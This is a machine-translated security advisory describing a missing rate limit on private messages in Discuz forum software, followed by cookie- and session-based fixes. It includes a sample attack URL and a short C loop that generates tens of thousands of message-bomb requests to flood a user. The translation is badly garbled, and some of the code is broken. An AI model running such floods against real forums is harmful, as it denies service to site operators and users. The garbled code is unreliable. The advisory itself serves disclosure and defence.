Discuz Forum Short Message unlimitedly sent Count Vulnerability

Preface
The Discuz forum is a PHP forum system developed by Crossday studio www.discuz.com. "Is an efficient forum solution designed to suit various server environments. Discuz! At the beginning of its establishment, we started to improve product efficiency, reduce enterprise costs, and improve enterprise competitiveness. After more than a year of new kernel architecture, development, and practical testing, this makes it stand out from many competitors in the short term and achieves unprecedented load capacity. "The above is an official introduction. As a forum, Discuz is indeed a top-notch player. However, security remains to be improved.
Involved versions:
Currently, all free versions (I do not have a commercial version)
Description:
Due to the Code sent by pm. php, the time interval is not limited. As a result, any user can send a message bomb to any user. As a result, server space and resources are consumed. Severe Denial of Service.
Details:
You can see 86 lines of code in the pm. php file:
86} elseif ($ action = 'send '){
87
88 if (! $ Pmsubmit ){
......
179 showmessage ('pm _ send_succeed ', 'pm. php ');
180}
This part of the Code does not detect the time interval limit code for users to send text messages. We only need to register any user to log on and submit:
Http: // 127.0.0.1/discuz/pm. php? Action = send... st & message = test
You can bomb the angel user. Attack methods to improve efficiency:
# Incluse
Main ()
{
Int I;
For (I = 0; I <55933; I ++)
{
Printf ("\ nwww.xxx.com/discuz/pm.php? Action = send & pmsubmit = submit & msgto = angel & subject = test & message = test ", I );
}
}
Compile and run file.exe> discuzpm.txt, and then import discuzpm.txt to any CGI scanner. Run ......
Defense methods:
1. Restrict the user's sending Interval
You can use php session or COOKIE to limit the interval of each mail sending. When handling text messages sent by users, you can select either of the following two methods to determine whether the user can send text messages continuously within the specified time. Assume that the administrator sets the interval between two posts to 2 minutes, let's take a look at the two examples below:
Cookie method:
If ($ beforepmid) die ("sorry, the interval between your two emails is less than 2 minutes"); // $ beforepmid
ID of the previous mail
Else setcookie ("beforepmid", $ pmid, time () + 60*2, "/", "", 0); // $ pmid
SMS ID
Session mode:
Session_start ();
If (session_is_registered ("time") & time ()-$ _ SESSION ['time'] <60*2)
{
Die ("sorry, the interval between your two posts is less than 2 minutes"); // the time of the previous mail
} Else {
$ Time = time ();
Session_register ("time ");
}
It seems that the Cookie needs to be sent to the client. Attackers can delete the Cookie, as if the Session is safer on the server side. But in fact I think it should be similar. Because the Cookie is sent continuously, the interval between them is very short. However, we do not rule out the use of small programs to delete cookies. For the sake of perfection, use the Session. The file in Session mode is "session_pm.php". Remove the previous "session _" and overwrite it to the Discuz directory. Remember to back up the pm. php file in the original Discuz directory to avoid irreparable errors.
If you want to use cookies to prevent attacks, use cookie_pm.php. Remove the previous "cookie _" and overwrite it to the Discuz directory. It is best to back up the pm. php file under the Discuz directory first.
2. How to Prevent the above attacks to improve efficiency
Add the following code after the first line
$ Pmsubmit = $ _ POST ['pmsubmit '];
$ Msgto = $ _ POST ['msgto '];
$ Subject = $ _ POST ['subobject'];
$ Message = $ _ POST ['message'];
OK. The efficient attack method mentioned above is invalid.
Finally, pay for two modified pm. php files http://www.4ngel.net/img/pm.rar ). One is cookie and the other is session. If you directly use the same file, change the file name to pm. php, overwrite it to the discuz directory, and then go to the Management Background: interface style-> template system.
Edit: Discuz! The templates option in the Language Pack. Search for "pm_box_isfull ",
'Pm _ box_isfull '=>' Your mailbox is full. You must delete unnecessary information before reading the short message. ',
Change to the following content:
'Pm _ box_isfull '=>' Your mailbox is full. You must delete unnecessary information before reading the short message. ',
'Pm _ send_partition '=>' sorry, the interval between two emails is less than 2 minutes. ',
'Pm _ nonexistence '=>' sorry, the short message does not exist or has been deleted. '
Special thanks to Jin Xuan net Co., http://www.gixuan.net.) to give great support and help. In fact, the discuz forum is still an immature forum. There are also some large and small vulnerabilities. Developers are expected to pay attention.